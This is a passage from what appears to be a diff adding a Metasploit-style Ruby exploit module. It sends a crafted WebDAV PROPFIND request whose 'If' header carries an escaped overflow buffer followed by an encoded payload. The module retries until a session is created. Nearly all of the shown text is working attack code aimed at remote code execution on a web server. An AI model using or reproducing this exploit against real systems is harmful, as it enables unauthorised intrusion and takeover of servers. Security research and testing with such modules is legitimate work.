"\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" + buf1 << payload.encoded + buf1 << ">" + + vprint_status("Sending payload") + res = send_request_raw( + 'method' => 'PROPFIND', + 'headers' => { + 'Content-Length' => 0, + 'If' => "#{buf1}" + }, + 'uri' => target_uri.path + ) + if res + vprint_status("Server returned status #{res.code}") + if res.code == 502 || res.code == 400 + next + elsif session_created? + return + else + vprint_status("Unknown Response: #{res.code}") + end + end + rescue ::Errno::ECONNRESET + vprint_status("got a connection reset") + next + end + end + end +end